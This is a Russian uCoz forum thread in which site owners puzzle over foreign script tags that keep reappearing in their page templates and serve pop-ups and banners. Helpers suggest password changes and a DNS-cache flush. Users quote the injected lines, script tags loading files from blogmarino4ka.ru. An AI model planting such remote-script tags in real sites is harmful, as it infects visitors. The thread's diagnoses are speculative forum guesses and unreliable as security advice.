Модератор форума: Yuri_G  
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Инородная реклама на сайте (никак не могу избавиться от сторонней рекламы)
Инородная реклама на сайте
Adward
Сообщений: 41
Репутация: 4

Сообщение # 46 | 09:14:35
Что за хрень происходит ?

Откуда в теле страниц появляется сторонний скрипт?

Уже два сайта своих вычистил.

Каким образом он туда попадает?

Причем, что характерно - на одном сайте никто не заходил в администраторскую панель, откуда можно получить доступ к коду.

Код
<script type="text/javascript" src="http://blogmarino4ka.ru/pop-up.js"></script>
<script type="text/javascript" src="http://blogmarino4ka.ru/jQuery.js"></script>


Откуда еще можно получить доступ к редактированию страниц?

Ничего не понимаю...
Сообщение отредактировал Adward - Суббота, 12 Янв 2013, 09:16:57
Miss_Esq
Сообщений: 13859
Репутация: 4159
Уровень замечаний:

Сообщение # 47 | 10:05:50
Adward,
Цитата
Уже два сайта своих вычистил
А компьютер ???

Adward
Сообщений: 41
Репутация: 4

Сообщение # 48 | 10:24:37
Компьютер никто со счетов не сбрасывает, но вот какая странность.

- Сайт работает несколько лет, проблем нет. http://omskiteboarding.ru/
- 11 января. Вечер, сайт работает нормально, никаких проблем.
- Никто не заходил в админ.панель, которая может дать доступ к внутреннему коду страницы.
- 12 января. Утро. Уже зараза на сайте. Постронние скрипты на всех страницах сайта.

Вопрос: каким образом это могло произойти.

Сайт №2 работает недавно http://www.biser-melody.ru/

- Была проблема с появлением непонятного скрипта, во время изменения дизайна страницы в Гугл Хром в админ. панели.
Как только сохраняешь страницу, непонятным образом появляется скрипт в Head. И сразу на всех страницах.

Выяснилось, что эту хрень распространяло (уже не помню какое) дополнение к Хрому. Выяснилось это так: при редактировании в Мозилле никаких скриптов не добавлялось, а в Хроме добавлялось. Удалил все дополнения и проблема исчезла.

Однако подозрительно вот что: сайт чистый, в панель управления никто не входит. Бац, скрипт уже появился.

Как это может произойти? Доступа к редактированию кода же не было.
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 49 | 13:33:36
Adward, меняйте uid пароль для этого профиля http://630872782.uid.me/ и второго администратора и остальных тоже заставьте

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Light_Wolf
Сообщений: 3
Репутация: 4

Сообщение # 50 | 22:42:53
Здравствуйте. Недавно на сайте стал появляться баннер с рекламой порнографического характера. Сначала я подумал, что это вина партнерки (directadvert.ru) и удалил код их системы, но баннер так и остался. Позже начал замечать, что со многими сайтами существует подобная проблема, даже с форумом ucoz-а. Было предположение и о том, что это вирус. Скрины прилагаются.
http://mugalim.ru/scr/1.png
http://mugalim.ru/scr/2.png
http://mugalim.ru/scr/3.png
http://mugalim.ru/scr/4.png
Таким образом, баннер связан с неизвестным сайтом gredinatib.biz.
Пожалуйста помогите разобраться и избавиться от этого баннера.
С уважением, Александр.
Прикрепления: 5711558.png (364.2 Kb) · 9879754.png (452.6 Kb)
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 51 | 23:20:59
Light_Wolf, вы этот баннер видите только в авторизованном состоянии или под гостем тоже? видите ли вы этот баннер с других браузеров?

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Light_Wolf
Сообщений: 3
Репутация: 4

Сообщение # 52 | 23:27:21
webanet, реклама появляется во всех браузерах и независимо от того, в авторизованном состоянии или нет. Кэш очищал, avast-ом сканировал.
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 53 | 23:37:16
Light_Wolf,
Цитата
Позже начал замечать, что со многими сайтами существует подобная проблема, даже с форумом ucoz-а
если и тут на форуме с вами случается, то стоит обратить внимание на чистоту своей системы

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Light_Wolf
Сообщений: 3
Репутация: 4

Сообщение # 54 | 11:31:05
Проблема решена после того, как очистил кэш DNS в командной строке от имени администратора.
webanet, спасибо Вам за помощь в решении проблемы.
Adward
Сообщений: 41
Репутация: 4

Сообщение # 55 | 20:35:35
Объясните, что за фигня происходит? Ситуация более чем странная...

Я поменял все пароли, все было нормально. Сегодня вечером на сайте было все нормально. И вот буквально полчаса назад ,мне звонят и говорят, что опять появилось всплывающее окно.

За все отвечает скрипт:
Код
<script type="text/javascript" src="http://blogmarino4ka.ru/jQuery_v2.js"></script>


КАКИМ ОБРАЗОМ ОН МОГ ВЛЕЗТЬ В КОД ?
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 56 | 20:56:52
Adward, на сайте есть ещё люди с доступом к коду? у вас есть ещё один администратор. он поменял все пароли? все должны сменить пароли к uid аккаунту

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Adward
Сообщений: 41
Репутация: 4

Сообщение # 57 | 22:58:57
Второй администратор - это жена smile . Она ни про какие скрипты и понятия не имеет. Работала с интернет-магазином, редактировала товар. Больше ничего.

Кроме того, после того, как она закрыла админ.панель, все тоже было нормально. Я вечером приехал, выкладывал новости на сайте в админку не входил, проблем не было. И вдруг, бац... приехали. Получается, что через несколько часов, после всего, неожиданно скрипт на сайте.

Пароли я все перед этим уже поменял.

Ничего не понимаю... раньше никогда подобного не было.

И такой вопрос - если я работаю в админке, не заходя в раздел дизайна, как возможно внедрить скрипт в код страницы без моего ведома? Это же надо внести и сохранить шаблон, как минимум. Разве нет?

Начинают терзать смутные сомнения. Откуда еще можно получить доступ к коду?
redis
Сообщений: 1
Репутация: 2

Сообщение # 58 | 00:28:07
Кто нашел как одолеть вредоносный скрипт выручайте, похоже в системе слабое место нашли!
каждый день подсаживает скриптик сайты
http://radif.at.ua
http://radif.my1.ru
http://rbox.my1.ru
Adward
Сообщений: 41
Репутация: 4

Сообщение # 59 | 08:01:52

Цитата
Кто нашел как одолеть вредоносный скрипт выручайте, похоже в системе слабое место нашли!

Одолеть то проблем нет. Две секунды и чисто (сделал резервную копию шаблонов, восстановил и все). Вопрос в другом - КАК они туда попадают ?

С утра на одном из своих сайтов, на которые никто из администраторов не заходил, уже был чужой скрипт
Код
<script type="text/javascript" src="http://blogmarino4ka.ru/jQuery_v2.js"></script>


Что происходит? Это проблема пользователей или проблема Ucoz ?

Мне кажется, что смена паролей тут ни при чем. Сменили пароли, скрипт появился, оставили пароли - аналогично.

Ощущение такое, что это происходит в том месте, где хранятся непосредственно файлы сайтов.
defaultNick3113
Сообщений: 1
Репутация: 0

Сообщение # 60 | 09:15:00
Здравствуйте! На моём сайте http://ra6fvl.3dn.ru/ появились всплывающие баннеры о взломанных аккаунтах одноклассников. Как их удалить? Подскажите пожалуйста. Когда смотрю код страницы вижу всякие инородные скрипты, которые нужно удалить. Но вот когда вхожу в редактор страниц почему-то отображается совсем другой код страницы - кристально чистый от всех скриптов. Как можно отредактировать код страницы? Куда заходить в редакторе?
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Инородная реклама на сайте (никак не могу избавиться от сторонней рекламы)
Поиск: